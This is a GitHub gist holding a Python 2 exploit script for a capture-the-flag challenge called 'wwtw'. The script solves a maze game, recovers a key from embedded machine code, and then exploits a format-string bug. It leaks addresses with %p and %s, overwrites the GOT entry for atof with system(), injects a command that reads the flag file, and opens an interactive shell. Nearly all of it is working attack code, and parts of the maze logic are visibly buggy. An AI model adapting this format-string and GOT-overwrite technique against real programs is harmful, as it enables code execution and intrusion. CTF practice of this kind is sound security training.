Instantly share code, notes, and snippets.

Embed
What would you like to do?
import socket
import time
import re
from Pwning import *
pl = Payload()
def get_socket(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
return s
def send(s, msg):
s.sendall(msg + "\n")
print '[+] Send:', repr(msg)
def recv(s):
data = s.recv(4096)
print data
return data
def recv_until(s, text):
data = ''
while text not in data:
new_data = recv(s)
if new_data == '':
break
data += new_data
if 'TARDIS KEY:' in data:
return data
import time
time.sleep(0.01)
return data
"""
MAZE GAME
"""
g_map = None
g_found = False
g_path = None
MAP_WIDTH = 20
MAP_HEIGHT = 20
TARGET_X = 89
TARGET_Y = 28
g_best_solution = 'A' * 1000
def get_valid_moves(moved_cells, x, y):
moves = []
if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False:
moves.append('d')
if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False:
moves.append('s')
if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False:
moves.append('w')
if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False:
moves.append('a')
return moves
def solve_rec(moved_cells, x, y, curr_path):
global g_best_solution
if g_found:
return
if len(curr_path) > len(g_best_solution):
return
if g_map[x][y] == 'E':
g_found = True
g_path = curr_path
available_moves = get_valid_moves(moved_cells, x, y)
for move in available_moves:
if move == 'w':
next_x = x
next_y = y - 1
elif move == 's':
next_x = x
next_y = y + 1
elif move == 'a':
next_x = x - 1
next_y = y
else:
next_x = x + 1
next_y = y
curr_path += move
moved_cells[next_y][next_x] = True
solve_rec(moved_cells, next_x, next_y, curr_path)
moved_cells[next_y][next_x] = False
curr_path = curr_path[:-1] # restore
def get_person_position():
for i in xrange(MAP_HEIGHT):
for j in xrange(MAP_WIDTH):
if g_map[i][j] in '^<>V':
return (i, j)
def get_target_position():
for i in xrange(MAP_HEIGHT):
for j in xrange(MAP_WIDTH):
if g_map[i][j] in 'ET':
return (i, j)
def get_moves(r, c):
return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)]
def get_best_move(m):
global g_map
g_map = m
person = get_person_position()
target = get_target_position()
print 'person:', person
print 'target:', target
best_score = 0
best_position_score = -1000000
best_position = (0, 0)
for p_r, p_c in get_moves(person[0], person[1]):
nearest_enemy = 1000
for r in xrange(MAP_HEIGHT):
for c in xrange(MAP_WIDTH):
if g_map[r][c] == 'A':
enemy_distance = abs(r - p_r) + abs(c - p_c)
if enemy_distance < nearest_enemy:
nearest_enemy = enemy_distance
target_distance = abs(target[0] - p_r) + abs(target[1] - p_c)
position_score = nearest_enemy - target_distance * 100
print (p_r, p_c), nearest_enemy, target_distance, position_score
if position_score > best_position_score and nearest_enemy != 0:
best_position_score = position_score
best_position = (p_r, p_c)
if best_position_score == -1000000:
return None
if best_position[0] < person[0]:
return 'w'
if best_position[0] > person[0]:
return 's'
if best_position[1] < person[1]:
return 'a'
return 'd'
def solve(m):
global g_map
g_map = m
moved_cells = []
for i in xrange(MAP_HEIGHT):
moved_cells.append([])
for j in xrange(MAP_WIDTH):
moved_cells[i].append(False)
person_position = get_person_position()
solve_rec(moved_cells, person_position[0], person_position[1], '')
return g_path
"""
MAZE GAME
"""
def read_map(raw):
m = [0] * 20
for i in xrange(20):
row = raw[i][3:]
m[i] = [c for c in row]
return m
def xor_string(a, b):
if len(a) > len(b):
a, b = b, a
ret = ''
for i in xrange(len(a)):
ret += chr( ord(a[i]) ^ ord(b[i]) )
return ret
def get_key():
import string
func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex')
key = ''
for c in func:
if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789':
key += chr(ord(c) & 0x7f)
if len(key) == 10:
break
return key
def _solve():
key = get_key()
while True:
s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606)
success = True
while True:
data = recv_until(s, 'Your move (w,a,s,d,q): ')
if 'TARDIS KEY:' in data:
break
raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1]
try:
game_map = read_map(raw_map)
except:
success = False
break
best_move = get_best_move(game_map)
if best_move is None:
success = False
break
send(s, best_move)
if success:
send(s, key)
recv(s)
send(s,'\x00'*9)
recv(s)
time.sleep(2)
send(s,pl.p(0x55592B6C + 1))
recv(s)
send(s,'\x00'*9)
print repr(recv(s))
send(s,pl.p(0x55592B6C + 1))
time.sleep(1)
send(s,'1\n')
recv_until(s, 'The TARDIS console is online!')
recv_until(s, 'Selection:')
send(s,'3\n')
recv_until(s, 'Coordinates: ')
send(s,'51.492137,-0.192878 {}\n'.format('%275$p'))
data = recv_until(s, 'would rip a hole in time and space. Choose again.')
match = re.findall(r'.+ (0x[0-9a-f]*) .+',data)
base_bin = int(match[0],16) - 0x1491
read = base_bin + 0x5010
atof_got = base_bin + 0x5080
print 'Base Bin :',hex(base_bin)
recv_until(s, 'Coordinates: ')
send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s'))
data = recv_until(s, 'would rip a hole in time and space. Choose again.')
print repr(data)
data = data[52:]
read = pl.up(data[4:8])
printf = pl.up(data[8:12])
print 'read() : ',hex(read)
print 'printf() : ',hex(printf)
system = read - 0x9aa40
print 'system() : ',hex(system)
recv_until(s, 'Coordinates: ')
send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 '))
recv_until(s, 'Coordinates: ')
send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n')
tn = telnetlib.Telnet()
tn.sock = s
tn.interact()
break
_solve()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment